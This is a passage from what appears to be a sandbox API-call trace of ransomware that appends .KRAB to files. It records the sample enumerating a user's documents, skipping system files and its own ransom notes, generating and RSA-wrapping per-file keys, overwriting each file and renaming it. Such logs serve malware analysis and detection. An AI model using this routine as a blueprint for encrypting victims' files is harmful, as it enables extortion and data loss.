dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.909] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x18b3d, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x18b3d, lpOverlapped=0x0) returned 1 [0090.910] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0090.910] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.948] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.949] CloseHandle (hObject=0x43c) returned 1 [0090.949] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.950] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\6p4trDe8K_8vpdH.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\6p4trde8k_8vpdh.ots"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\6p4trDe8K_8vpdH.ots.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\6p4trde8k_8vpdh.ots.krab")) returned 1 [0090.951] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.951] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0090.951] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0090.951] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0090.951] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\d2ca4a08d2ca4dee3d.lock" [0090.951] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.951] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 96 [0090.951] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\d2ca4a08d2ca4dee3d.lock") returned 91 [0090.951] lstrlenW (lpString=".lock") returned 5 [0090.951] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.952] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0090.952] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.953] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.953] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0090.953] lstrcmpW (lpString1="IgJulx.odt", lpString2=".") returned 1 [0090.953] lstrcmpW (lpString1="IgJulx.odt", lpString2="..") returned 1 [0090.953] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\", lpString2="IgJulx.odt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\IgJulx.odt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\IgJulx.odt" [0090.953] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.953] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\IgJulx.odt.KRAB") returned 83 [0090.953] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\IgJulx.odt") returned 78 [0090.953] lstrlenW (lpString=".odt") returned 4 [0090.953] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.954] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".odt ") returned 5 [0090.954] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.954] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\IgJulx.odt") returned 78 [0090.954] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\IgJulx.odt") returned 78 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="desktop.ini") returned 1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="autorun.inf") returned 1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="ntuser.dat") returned -1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="iconcache.db") returned 1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="bootsect.bak") returned 1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="boot.ini") returned 1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="ntuser.dat.log") returned -1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="thumbs.db") returned -1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="KRAB-DECRYPT.html") returned -1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="ntldr") returned -1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="NTDETECT.COM") returned -1 [0090.954] lstrcmpiW (lpString1="IgJulx.odt", lpString2="Bootfont.bin") returned 1 [0090.954] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.955] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010bd8) returned 1 [0090.956] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.957] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.957] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.957] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0090.957] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.957] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.957] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010bd8) returned 1 [0090.962] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.962] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.963] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.963] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0090.963] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.963] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.963] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10113d0) returned 1 [0090.964] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd3e0) returned 1 [0090.964] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.964] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.965] GetLastError () returned 0x0 [0090.965] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0090.965] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0090.965] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011678) returned 1 [0090.967] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd920) returned 1 [0090.967] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0090.967] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0090.967] GetLastError () returned 0x0 [0090.967] CryptDestroyKey (hKey=0xfbd920) returned 1 [0090.967] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0090.967] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\IgJulx.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\igjulx.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0090.968] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.968] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.968] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x210d, lpOverlapped=0x0) returned 1 [0090.983] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffdef3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.983] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x210d, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x210d, lpOverlapped=0x0) returned 1 [0090.983] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0090.983] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.988] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.988] CloseHandle (hObject=0x43c) returned 1 [0090.988] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.988] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\IgJulx.odt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\igjulx.odt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\IgJulx.odt.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\igjulx.odt.krab")) returned 1 [0090.989] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.989] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0090.989] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0090.989] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0090.989] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\KRAB-DECRYPT.txt" [0090.989] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.990] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\KRAB-DECRYPT.txt.KRAB") returned 89 [0090.990] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\KRAB-DECRYPT.txt") returned 84 [0090.990] lstrlenW (lpString=".txt") returned 4 [0090.990] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.990] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0090.990] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.990] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\KRAB-DECRYPT.txt") returned 84 [0090.991] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\KRAB-DECRYPT.txt") returned 84 [0090.991] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0090.991] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0090.991] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0090.991] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0090.991] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0090.991] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0090.991] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0090.991] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0090.991] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0090.991] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0090.991] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.994] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0090.994] lstrcmpW (lpString1="mfDRRYEji.docx", lpString2=".") returned 1 [0090.994] lstrcmpW (lpString1="mfDRRYEji.docx", lpString2="..") returned 1 [0090.994] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\", lpString2="mfDRRYEji.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\mfDRRYEji.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\mfDRRYEji.docx" [0090.994] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.994] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\mfDRRYEji.docx.KRAB") returned 87 [0090.994] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\mfDRRYEji.docx") returned 82 [0090.994] lstrlenW (lpString=".docx") returned 5 [0090.994] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.994] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0090.994] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.995] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\mfDRRYEji.docx") returned 82 [0090.995] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\mfDRRYEji.docx") returned 82 [0090.995] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="desktop.ini") returned 1 [0090.995] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="autorun.inf") returned 1 [0090.995] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="ntuser.dat") returned -1 [0090.995] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="iconcache.db") returned 1 [0090.995] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="bootsect.bak") returned 1 [0090.995] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="boot.ini") returned 1 [0090.995] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="ntuser.dat.log") returned -1 [0090.995] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="thumbs.db") returned -1 [0090.995] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="KRAB-DECRYPT.html") returned 1 [0090.995] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.995] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.996] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="ntldr") returned -1 [0090.996] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="NTDETECT.COM") returned -1 [0090.996] lstrcmpiW (lpString1="mfDRRYEji.docx", lpString2="Bootfont.bin") returned 1 [0090.996] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.996] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010bd8) returned 1 [0090.998] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.998] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.998] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.998] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0090.998] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.998] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.999] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x10113d0) returned 1 [0091.000] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.000] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.001] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.001] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0091.001] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0091.001] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.001] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011898) returned 1 [0091.020] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd3e0) returned 1 [0091.020] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0091.020] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0091.020] GetLastError () returned 0x0 [0091.020] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0091.020] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0091.020] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011678) returned 1 [0091.024] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd7a0) returned 1 [0091.024] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0091.024] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0091.024] GetLastError () returned 0x0 [0091.024] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0091.024] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0091.024] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\mfDRRYEji.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\mfdrryeji.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0091.025] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0091.025] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0091.025] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x1664e, lpOverlapped=0x0) returned 1 [0091.050] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffe99b2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.050] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1664e, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x1664e, lpOverlapped=0x0) returned 1 [0091.050] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0091.050] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.054] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.055] CloseHandle (hObject=0x43c) returned 1 [0091.055] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.055] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\mfDRRYEji.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\mfdrryeji.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\mfDRRYEji.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\xrugo\\mfdrryeji.docx.krab")) returned 1 [0091.056] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.056] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0091.056] lstrcmpW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2=".") returned 1 [0091.057] lstrcmpW (lpString1="OUuT25IXSLeinWNP.ppt", lpString2="..") returned 1 [0091.057] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\", lpString2="OUuT25IXSLeinWNP.ppt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\OUuT25IXSLeinWNP.ppt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\xRugo\\OUuT25IXSLeinWNP.ppt" [0091.057] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, 